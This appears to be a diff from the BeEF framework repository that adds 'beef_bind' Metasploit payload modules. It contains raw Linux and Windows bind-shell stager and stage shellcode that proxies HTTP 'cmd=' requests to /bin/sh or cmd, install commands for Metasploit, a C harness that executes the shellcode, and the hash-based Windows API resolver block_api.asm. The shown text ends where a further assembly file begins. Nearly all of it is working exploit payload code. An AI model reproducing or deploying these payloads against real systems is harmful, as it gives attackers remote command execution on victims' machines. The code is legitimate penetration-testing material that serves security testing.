"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
"\xf6\x48\x31\xd2\x0f\x05"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

84
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb Normal file
View File

@@ -0,0 +1,84 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 168, 'n' ]
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

137
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb Normal file
View File

@@ -0,0 +1,137 @@
##
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Ty Miller' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 511, 'n' ]
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
"\xff\xd5\xe9\x58\xfe\xff\xff"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

49
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb Normal file
View File

@@ -0,0 +1,49 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 54, 'n' ] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
"\x01\xc6\xff\xe6"
}
))
end
end

47
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb Normal file
View File

@@ -0,0 +1,47 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 47, 'n' ] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}
))
end
end

62
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb Normal file
View File

@@ -0,0 +1,62 @@
##
# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}
))
end
end

37
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt Normal file
View File

@@ -0,0 +1,37 @@
Install into Metasploit on BackTrack:
cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb
cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb
cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb
cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
Check it works:
msfpayload -l | grep beef_bind
Get info on the payload:
msfpayload windows/beef_shell/beef_bind S
Dump stager and stage in C format:
msfpayload windows/beef_shell/beef_bind C
Dump stager in raw format:
msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
Encode stager to remove nulls:
msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'

12
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm Normal file
View File

@@ -0,0 +1,12 @@
[SECTION .text]
BITS 32
[ORG 0] ;code starts at offset 0
cld ;clear the direction flag
call start ;jump over block_api and push its address onto the stack
%include "src/block_api.asm"
start:
pop ebp ;pop the address of block_api into ebp for calling functions later
%include "src/block_beef_bind-stage.asm" ;setup web listener to proxy requests and responses to the shell

12
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm Normal file
View File

@@ -0,0 +1,12 @@
[SECTION .text]
BITS 32
[ORG 0] ;code starts at offset 0
cld ;clear the direction flag
call start ;jump over block_api and push its address onto the stack
%include "src/block_api.asm"
start:
pop ebp ;pop the address of block_api into ebp for calling functions later
%include "src/block_beef_bind-stager.asm" ;setup bind port, receive web request, locate stage, execute it

36
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c Normal file
View File

@@ -0,0 +1,36 @@
/**
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
A standalone version can be compiled with MinGW:
c:\MinGW\bin>gcc -o beefstager.exe beefstager.c
and then executed with:
c:\MinGW\bin>beefstager.exe 1234
or just with the default port 4444:
c:\MinGW\bin>beefstager.exe
**/
#include <stdlib.h>
char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6";
int main(int argc, char **argv)
{
if (argc == 2){
int port;
port = atoi(argv[1]);
if (port <= 0xFFFF){
code[200] = ((port & 0xFF00) >> 8) & 0xFF;
code[201] = ((port & 0xFF));
}
}
int (*func)();
func = (int (*)()) code;
(int)(*func)();
return 0;
}

97
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm Normal file
View File

@@ -0,0 +1,97 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 137 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: The hash of the API to call and all its parameters must be pushed onto stack.
; Output: The return value from the API call will be in EAX.
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
; Note: This function is unable to call forwarded exports.
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor edx, edx ; Zero EDX
mov edx, [fs:edx+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to itterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA
test eax, eax ; Test if no export address table is present
jz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address
push eax ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names
mov ebx, [eax+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp short next_mod ; Process this module

177
modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm Normal file
View File

